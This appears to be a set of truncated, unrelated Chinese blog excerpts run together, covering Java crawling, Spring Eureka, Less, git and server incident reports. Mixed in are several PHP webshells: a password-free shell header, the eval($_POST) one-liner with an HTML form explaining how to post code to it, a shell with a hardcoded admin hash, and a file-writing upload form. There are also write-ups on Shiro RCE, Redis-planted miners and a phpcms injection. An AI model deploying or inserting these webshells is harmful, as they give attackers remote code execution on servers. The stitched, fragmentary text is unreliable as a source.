<?php ;//无需验证密码! $shellname='hello~地球~猴子星球欢迎你 '; define('myaddress',__FILE__); error_reporting(E_ERROR | E_PARSE); header("content-Type: text/html; charset=gb2312"); @set_time_limit(0); ob_start(); define('envlpass',$password); define('shelln…

eval可以用来执行任何其他php代码,所以对于代码里发现了eval函数一定要小心,可能是木马 就这一句话害死人,这样任何人都可以post任何文件上来,所以要做好防范 <?php @eval($_POST['c']);?> 使用方法也很简单,本地提交文件指向提交文件,里面的php代码就会被执行 <html> <body> <form action="a.php" method="post"> <input typ…

最近在学习用java来做爬虫但是发现不管用那种方式都是爬取的代码比网页的源码少了很多在网上查了很多都说是inputStream的缓冲区太小而爬取的网页太大导致读取出来的网页代码不完整,但是后面发现并不是这个问这个是用HttoClient所作的public static String getHtml2(String url) { try { HttpGet httpRequest = new HttpGet(url); HttpClient httpclient = new DefaultHttp…

该贴为入门贴,看完可快速知道服务注册与发现是什么?怎么用?至于深入的内容不在此篇文章所述之内,请自行百度. 内容来自:https://blog.csdn.net/nanbiebao6522/article/details/80574463 本文讲述如下内容: 1.什么是Eureka,什么是服务注册与发现 2.服务端 3.客户端---服务提供者 4.客户端--服务消费者 5.负载均衡 1.什么是Eureka,什么是服务注册与发现 Spring Boot作为目前最火爆的web框架.那么它与Eurek…

写代码是一件令人兴奋的事情,特别是对于  .NET 开发人员来说,平台越来越智能化了.我们现在默认在 .NET SDK 中包含丰富的诊断和代码建议.在您需要安装 NuGet 包或其他独立工具来进行更多的代码分析之前.现在,您将在新的 .NET 5 SDK 中自动获得这些内容. 过去,我们一直不愿意向 C# 添加新的警告.这是因为,对于将警告视为错误的用户来说,添加新的警告从技术上来说是一种对源代码的影响.然而,这些年来,在我们遇到的很多情况中,我们也确实想警告人们有些地方出了问题,从常见的编码错…

背景 某公司线上服务器意外发现一个Apache Shiro 反序列化漏洞,可以直接GetShell.出于做安全的谨慎,马上出现场应急,确认漏洞.该漏洞存在在cookie字段中的rememberMe字段中,可以RCE 漏洞应急 来到现场后,发现已经升级了,漏洞确认修复完成,只能查看以前的攻击痕迹. 查看账号情况 首先查看账户文件/etc/passwd,修改时间和内容没有什么问题 stat /etc/passwd cat /etc/passwd 查看文件情况 查看最近修改过的文件没看到特殊异常 ls…

最近在研究基于标签传播的社区分类,LabelRank算法基于标签传播和马尔科夫随机游走思路上改装的算法,引用率较高,打算将代码实现,便于加深理解. 这个算法和Label Propagation 算法不同的是计算复杂度较高,对每个标签都确定了概率,但是准确性比Label Propagation算法好. 一.概念 相关概念不再累述,详情见前两篇文章 二.算法思路 首先建立一个标签集合,C={1,2,……n},n是节点的数量.标签概率向量Pi(1*n),Pi(c)=节点i对标签c的概率估计,迭代过程中…

近期刚做的一个项目.关于 Socket TCP 通信. 需求方提供了一个 ARM 机器,及数据採集器,须要我做一个服务端与数据採集器进行交互. 目的: 数据採集器:定时将读取到的数据发送到服务端. 服务端:将数据採集器发送过来的数据保存在本地. 要求: 1.通信以 TCP 方式进行交互,port可配置. 2.自己实现握手.心跳包机制. 3.TCP 包结构包含:包头.有效数据总长度.有效数据.CRC 校验.包尾,当中有效数据包含指令序号和指令内容,为经过 AES 128位加密的 XML 数据. 4…

<?php error_reporting(E_ERROR);@ini_set('display_errors', 'Off');@ini_set('max_execution_time', 20000);@ini_set('memory_limit', '256M');header('content-Type: text/html; charset=utf-8');$password = '21232f297a57a5a743894a0e4a801fc3'; //admindefine('Vi…

<?phpheader("content-Type: text/html; charset=utf-8");if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v);?><form method="POST"> 保存文件名: <input type="text" name="file"…

前几天,公司两台linux服务器,一台访问速度很慢,cpu跑满,一台免密码登录失效,公钥文件被改写成redis的key.用htop命令查询发现了minerd木马进程,初步猜测是redis没有配访问权限造成的.网上查询minerd木马,发现这是一个很常见的挖矿程序,相关猜测也得到了验证. 下文是网上搜索到的清除minerd木马方法. 现状描述 1.top可以看到,这个minerd 程序把cpu跑满了 2.ps aux | grep minerd 可知是这个程序: /opt/minerd 这个不是我…

本月第二次,Google 从官方应用商店 Google Play 中移除了伪装成合法程序的恶意应用.被移除的应用都属于名叫 Ztorg 的 Android 恶意程序家族.目前为止,发现的几十个新的Ztorg木马的变异程序,无一例外都是利用漏洞在受感染的设备上获得root权限. 但是卡巴斯基实验室的安全研究人员发现,在2017年5月下旬以来,在最新捕获的Ztorg木马(Magic Browser.Noise Detector)的变异程序中,却发现它们并没有使用设备的root权限.黑客利用了恶意木马…

几年前,敲诈者木马还是一个默默无闻的木马种类.然而,由于其极强的破坏力和直接且丰厚的财富回报,敲诈者木马这几年已经一跃成为曝光率最高的木马类型——甚至超越了盗号木马.远控木马.网购木马这传统三强.与此同时,各种敲诈者木马也在不断推陈出新,变着花样地出现在分析人员的视野中. 私信小编007即可自动获取大量Python视频教程,还有各类PDF! 去年,360安全团队就发现了一款使用PHP语言编写的敲诈者木马(具体内容参考<用世界上最好的编程语言写成的敲诈者木马>).最近,一款使用Python语言编…

昨晚凌晨收到新客户的安全求助,说是阿里云短信提示,网站有webshell木马文件被植入,我们SINE安全公司立即成立,安全应急响应小组,客户提供了阿里云的账号密码,随即登陆阿里云进去查看到详情,登陆云盾看到有这样的一个安全提示"网站后门-发现后门(Webshell)文件"事件等级:紧急,影响资产:阿里云ECS:ID,然后贴出了网站木马文件的路径地址:/www/wangzhan/safe/indnx.php. 网站安全事件说明:云盾检测到当成有异常进程在尝试向磁盘上写入WEBSHELL后…

SINE安全公司在对phpcms2008网站代码进行安全检测与审计的时候发现该phpcms存在远程代码写入缓存文件的一个SQL注入漏洞,该phpcms漏洞危害较大,可以导致网站被黑,以及服务器遭受黑客的攻击,关于这次发现的phpcms漏洞细节以及如何利用提权我们来详细剖析. phpcms2008是国内深受站长建站使用的一个内容CMS管理系统,phpcms的开源话,免费,动态,静态生成,API接口,模板免费下载,自定义内容设计,可提供程序的二次开发与设计,大大方便了整个互联网站长的建站使用与优化.…

摘自:http://kczxsp.hnu.edu.cn/upload/20150504165623705.pdf 里面对于木马的实验过程写得非常清楚,值得一看.   木马是隐藏在正常程序中的具有特殊功能的恶意代码,是具备破坏.删除和 修改文件.发送密码.记录键盘.实施 DOS 攻击甚至完全控制计算机等特殊功 能的后门程序.它隐藏在目标的计算机里,可以随计算机自动启动并在某一端口 监听来自控制端的控制信息. 1 .木马的特性 木马程序为了实现某特殊功能,一般应该具有以下性质: ( 1 ) 伪装性…

先说下将这个话题的起因:最近发现公司的功能代码,很多在dom对象删除以后,其声明的绑定在window上的resize事件还一直存在,导致相同的功能代码执行了几次.对于我这种轻微代码洁癖的人来说,简直是个大坑. 所以,这里以jQuery的resize方法为例,讲解下我所理解的高效写法. 先看一下普通的在window下绑定resize事件: $(window).resize(function(){ console.log("hehe"); }); $(window).resize(func…

今天在公司要求的代码中,要求显示的提示能够更加具有多样化,而不是简单的Toast字样,第一想法肯定是自定义View呀,结果在浏览中发现还有这样的一个开源代码——Crouton. 几经折腾,发现这个东西还真是好用.不但可以给Toast置底色,还可以随意定义显示位置,而且还可以让你自己去自定义. Demo代码已同步至:https://github.com/nanchen2251/CroutonDemo 上个简单的运行图 : Crouton有三种底色:Alert(红色),Info(蓝色),Confir…

经过历时三天的鏖战,终于将阶段性项目——新闻发布系统做完了.在编码过程中,发现了很多冗余代码,统一流程,却需要不断重复编码——将用户输入实例化为对象的过程. 例: Person.set("id", 1); Person.set("name", "hu"); Person.set("birthday", new Date()); 基于此我将该过程中间过程抽离出来,采用反射机制,遍历所有属性名获取对应的值,并将其放进实例化对象,达…

css是不能够定义变量的,也不能嵌套.它没有编程语言的特性.在项目开发中,常常发现有很多css代码是相同的,但我们通常都是复制然后粘贴. 举个例子:假设h5应用里主题色是#FF3A6D,可能用于文字或者背景色.通常开发中,哪里需要这个颜色,我们就复制这个颜色并粘贴.下次要修改就得全部查找批量替换,其实不是很方便. 本文即将介绍的less将让我们更快更方便的编写css代码. Less是什么 Less 是一门 CSS 预处理语言,它扩充了 CSS 语言,增加了诸如变量.混合(mixin).函数等功能…

最近帮同学做一个网站,同学买的是阿里云服务器,Linux发行版是Ubuntu12.04.我在本地把程序写好,都调试好了.然后他让我自己发布和部署.之前在大学里上操作系统课程时,也用过一段时间的Ubuntu,那个时候应该是10.04.并且是虚拟机,有界面的.现在是服务器版本,只有命令行,而且自己要使用终端模拟器链接. 所以就搜索资料,看哪些工具好用,而已方便.找了一圈,发现下面2个工具结合起来蛮好的.文件上传和权限改变工具:WinSCP,另外一个就是命令行终端模拟器:Xshell.这2个工具顺利帮…

开篇前言 Linux服务器一直给我们的印象是安全.稳定.可靠,性能卓越.由于一来Linux本身的安全机制,Linux上的病毒.木马较少,二则由于宣称Linux是最安全的操作系统,导致很多人对Linux的安全性有个误解:以为它永远不会感染病毒.木马:以为它没有安全漏洞.所以很多Linux服务器都是裸奔的.其实在这次事件之前,我对Linux的安全性方面的认识.重视程度也是有所不足的.系统的安全性是相对而言的,没有绝对的安全,风险无处不在.   案例描述 我们在云端(中信国际电讯CPC)的一台Linu…

阅读目录: 1.背景介绍 2.简单介绍表模块模式.事务脚本模式 3.正确的编写表模块模式.事务脚本模式的代码 4.总结 1.背景介绍 要想正确的设计系统架构就必须能正确的搞懂每个架构模式的用意,而不是胡子眉毛一把抓.现在有一个现象是什么呢,项目的结构从表面上看是很不错,层分的很合理,其实对业务系统来说也就那么几种层设计方法,但是现在很多项目的逻辑架构的设计不是理想,有很多概念大家并不是很了解,当然也许每个人对技术的追求不同罢了.不管你追求不追求,事实我们还是要去往正确的方向努力才对的. 很多人包…

今天写代码的时候发现使用快捷键格式化代码没用了. 首先,先看看自己手动格式化是否还行 右键 - Source - Format 结果:正常! 既然手动正常的话那就可能是这个快捷键的热键被占用了,然后我看看正在运行的程序. 可疑进程:搜狗输入法 打开搜狗输入法的设置,果然!有一项快捷设置简繁体的,占用了格式化代码的热键.这个用处也不大,直接取消了. OK解决~…

上周没事扫扫系统原来的代码,突然发现这样一段代码: if(log.isInfoEnable()) { log.info("ID"+userID+"pwd"+userPwd); } 因为之前写的日志类都是公司内部自己的日志类,对log4j用的并不多.当时看了这段代码觉得很奇怪,代码意思我是明白的,log本身就可以根据打印权限,判断当前是否打印呀,为什么专门要加上这样一条判断呢?后来查了一下,发现是由于性能方面考虑的. 如果直接写入这样一段话 log.info(&quo…

今天搞了下午git,写完代码commit之后,pull完发现没法push,说是和origin有分支,然后自己查资料又是reset又是rebase的,commit之后发现自己改动的代码几乎没有被提交上去,然后果断的revert掉了.更奇怪的是自己重新拉source之后发现自己的代码竟然出现了............. 然后开完会之后,同事发现他的代码   不 !见!了!日了个喵的.背锅背锅.....但是现在我也没搞懂这些鬼东西,我的生涯一片苦海啊,弄不懂这些东西真的很恶心,自己搞自己其实没什么,连…

随着富 Web 前端应用的出现,开发人员不得不重新审视并重视 JavaScript 语言的能力和使用,抛弃过去那种只靠“复制 / 粘贴”常用脚本完成简单前端任务的模式.JavaScript 语言本身是一种弱类型脚本语言,具有相对于 C++ 或 Java 语言更为松散的限制,一切以函数为中心的函数式编程思想也为开发人员提供了更加灵活的语法实现.然而,这种灵活性在带来高效的同时,也成为初学或者经验不足的 JavaScript 开发人员的噩梦.形式各异的代码风格.隐含错误的代码行为,严重影响了整体代码…

在很多场合能看到unicode编码过的文字,如“\u6d3b\u52a8\u63a5\u53e3”,虽然程序会认识,但人眼无法阅读,很不方便,网络上很多人写了很多的转换函数,但是一个比一个臃肿,终于发现用一行PHP代码解决的方案: $str = '{"success":true,"msg":"\u6d3b\u52a8\u63a5\u53e3"}'; echo $str= preg_replace("#\\\u([0-9a-f]+)#ie…

发现最近写的代码,通过GitBash上传到github,但是格子确一个都没亮,今天通过一番检索解决了此问题,特做记录: 通过这篇文章找到了原因所在: GitHub 更新代码到底怎样才算贡献? 通过这篇文章顺利完成了用户名以及密码的设置:  git安装以及设置ssh,用户名和邮箱…

由于自己也碰到过这种情况,刚好看到这篇文章,先转载过来.的确蛮有用的哦. 首先剧透一下后门木马如下: (当然这是事后平静下来后慢慢搜出来的,那个时候喝着咖啡感觉像个自由人) 木马名称 Linux.BackDoor.Gates.5 http://forum.antichat.ru/threads/413337/ 首先是下午14点左右有几台服务器出现流量超高,平时只有几百M的流量,那时候发现流量上G了,达到这个量第一感觉就是遭受了DDOS流量攻击,那时候手上的服务器比较多,出现几台并没 有放在眼里,…